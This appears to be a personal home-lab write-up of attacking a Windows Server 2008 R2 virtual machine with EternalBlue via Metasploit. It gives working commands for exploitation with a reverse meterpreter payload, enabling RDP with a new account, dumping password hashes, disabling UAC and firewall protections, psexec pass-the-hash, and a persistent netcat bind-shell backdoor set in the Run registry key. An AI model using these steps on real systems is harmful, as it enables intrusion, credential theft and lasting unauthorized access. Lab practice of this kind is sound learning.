Table of contents
1. Install target and attack aircraft
2. Reappearance of Eternal Blue
3. Remote desktop login used by Eternal Blue.
4. Remote desktop login encountered problems
4.2 does not support remote desktop
5. Close the host protection policy and open the back door
5.5 use use exploit /windows/smb/psexec
5.5.1 Simple understanding of psexec
1. Install target and attack aircraft
First of all, I completed the shooting range image address MSDN on the virtual machine, let me tell you - make a quiet tool station , I chose win server 2008 R2 here, remember to select the bridge mode when installing the virtual machine, so that your virtual machine and physical Machines or other virtual machines belong to the same network segment.
Kali download address: Get Kali | Kali Linux can be opened directly in the virtual machine.
Attacker kali ip is 192.168.3.138
Target machine win server 2008 R2 ip is 192.168.3.147
2. Reappearance of Eternal Blue
1. First know the IP addresses of your target and attack aircraft
2. You can use nmap to scan the target machine to open those ports in Kali, and you can see that the ports 135, 445, and 4915 are open. This command will scan whether the commonly used ports are open.
3. Enter msfdb run to enter msf, and there will be different patterns every time, which feels like a little surprise. This time it was a duck.
4. Start searching ms17_010 command search ms17_010
5. First use the aux module to scan the target machine for vulnerabilities. The steps are as follows
The first step is to use the scanning module use auxiliary/scanner/smb/smb_ms17_010
The second step is to view those parameters need to set show options
The third step is to set the target machine ip set RHOSTS 192.168.3.147
The fourth step is to run run
If you see Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit), it means that the target machine is easily attacked by ms17-010
6. Start using the exploit module to attack.
The first step is to use the attack module use exploit/windows/smb/ms17_010_eternalblue
The second step is to view those parameters need to set show options
The third step is to set the target machine ip set RHOSTS 192.168.3.147,
There is no need to set payloads because my kali is automatically set up. The main settings are the IP address and port of the attacking machine. Because a session needs to be established, how can we fall in love without a partner. If you need to change your own settings. (I am afraid that some people will not set it up, set payload windows/x64/meterpreter/reverse_tcp. You can follow the payload you want to use later, you can view the payload through shows payload)
The fourth step is to run run
7. When you see this, the attack is successful. A session is established.
3. Remote desktop login used by Eternal Blue.
In Computer - Properties - Advanced System Settings - Remote, you can see that remote connections are not allowed by default. We can allow the target machine to allow remote connections through commands.
Start the 3389 port of the target host, which is the remote desktop protocol, and execute the remote link command
run post/windows/manage/enable_rdp
Go back and open the system properties of the target machine, and you will find that the remote connection is already running.
If you scan the port again and find that port 3389 is already open
The next step is remote login, login requires account password, we can use the command to create a
run post/windows/manage/enable_rdp USERNAME=thy PASSWORD=1
Now you can log in to the remote desktop, rdesktop 192.168.3.147, enter the account number and password to log in.
4. Remote desktop login encountered problems
4.1 Password policy
This is the problem I encountered when I was operating. First of all, the first one is that it always fails when creating a user. Later, I directly create a user on my target machine and it also fails. What password complexity, password policy, you need to set the password The complexity disabling steps are as follows
Enter gpedit.msc-windows settings-security settings-account policy-password policy-disable password complexity.
4.2 does not support remote desktop
The second is that you have to check whether your target machine supports remote desktop links. The news I got from Baidu is that the normal version of Windows Home does not support it. It can be seen in the computer properties, or when you open the remote, as long as I only have the upper part of the page, and there are no three choices in the lower part, it means that you can't do it.
5. Close the host protection policy and open the back door
5.1 View user and password
Use hashdump to view users and passwords, and later we need to set accounts and passwords
5.2 Create firewall rules
Because the firewall is enabled, create a firewall rule to allow port 4444 to access the network, which is convenient for later operations
The shell can enter the cmd command operation
netsh firewall add portopening TCP 4444 "thy" ENABLE ALL
5.3 Turn off UAC
Its principle is to inform the user whether to authorize the application to use the hard drive and system files, which has achieved the effect of helping to prevent malicious programs from damaging the system.
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fADD adds a registry key
-v create key-value
-t key-value type
-d value of the key
-f force registry entries to be modified
5.4 Enable default sharing
Enable the default sharing of the system host. The default sharing is very convenient for host file sharing, and it is also convenient for hackers to use this function to execute commands remotely.
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Enter exit multiple times until you return to meterpreter, and enter background to keep the session just obtained by Eternal Blue in the background.
5.5 use use exploit /windows/smb/psexec
5.5.1 Simple understanding of psexec
psexec is a very good remote command line tool under windows. The use of psexec does not require the other party's host to start port 3389, but only needs the other party to enable the admin$ share (this share is enabled by default). However, if the target host has a firewall enabled, psexec cannot be used, and it will prompt that the network path cannot be found. Since psexec is a tool provided by windows, antivirus software will add it to the whitelist.
The basic principle of psexec is: create a psexec service on the remote target machine through the pipeline, and generate a binary file named "PSEXESVC" in the local disk. Then, run the command through the psexec service, and delete the service after the run is complete.
When using psexec to execute remote commands, a psexec service will be created in the target system. After the command is executed, the psexec service will be automatically deleted. Since a large number of logs are generated when creating or deleting a service, the attack process will be reversed through the logs when tracing the source of the attack.
Prerequisites for using psexec:
-
The other host has enabled the admin$ share, if the admin$ share is turned off, it will prompt: the network name cannot be found
-
If it is a workgroup environment, you must use the administrator user to connect. If you use a normal user connection, you will be prompted: Login failed: The user is not granted the requested login type on this computer.
-
If it is a domain environment, ordinary domain users can be used to connect to ordinary domain hosts, and domain administrators are required to connect to domain controllers.
5.5.2 Use specific steps
The first step is to use the scanning module use exploit/windows/smb/psexec
The second step is to view those parameters need to set show options
The third step is to set the target machine ip set RHOSTS 192.168.3.147
The fourth step is to set the account name of the target machine set smbuser thy
The fifth step is to set the target machine password set smbpass (hash value)
The sixth step is to set the working group of the target machine set smbdomain (working group, which can be seen in the computer properties)
The fourth step is to run run
6. Upload backdoor
6.1 Upload backdoor program
In order to make the connection persistent, we can upload a backdoor program, so that the session can be kept established for a long time. In Kali, there is our backdoor program nc commonly known as the Swiss Army Knife in the following path. We can upload it to the target computer c drive
Upload nc to the Windows folder on the C drive. If you want to be more concealed, you can upload it to the folder
Open the window folder of the target machine and you can see that the file has been successfully uploaded.
6.2 Set the key value
When the target machine is turned on, the program runs in the background, and the listening port is 443, which can be set by yourself.
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'
If your firewall does not configure this port, you need to create a new firewall rule to allow port 443 to access the network. You can restart the target machine through the reboot command, and then connect through nc -v 192.168.3.147 443.
netsh firewall add portopening TCP 443 "thy" ENABLE ALL
The above is my own attack practice, record it, keep going.